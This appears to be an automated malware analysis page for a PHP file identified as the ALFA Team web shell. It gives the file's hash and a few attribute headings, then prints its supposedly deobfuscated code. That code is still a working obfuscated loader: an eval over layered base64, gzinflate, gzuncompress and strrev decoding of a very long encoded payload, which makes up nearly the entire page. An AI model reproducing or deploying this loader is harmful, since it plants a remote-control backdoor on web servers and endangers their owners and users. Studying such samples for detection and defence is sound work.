PHP Malware Analysis

alfav4-1.php

md5: 070fa29ffedbb4b65a80ab4fae827821

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title
  • ~ ALFA TEaM Shell-v\'.__ALFA_VERSION__.\'-\'.__ALFA_CODE_NAME__.\' ~
    \r\n
    alfa team 2012
    \ (Traces)
  • 403 Forbidden (HTML)

URLs


Deobfuscated PHP code

<?php

$tool = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "=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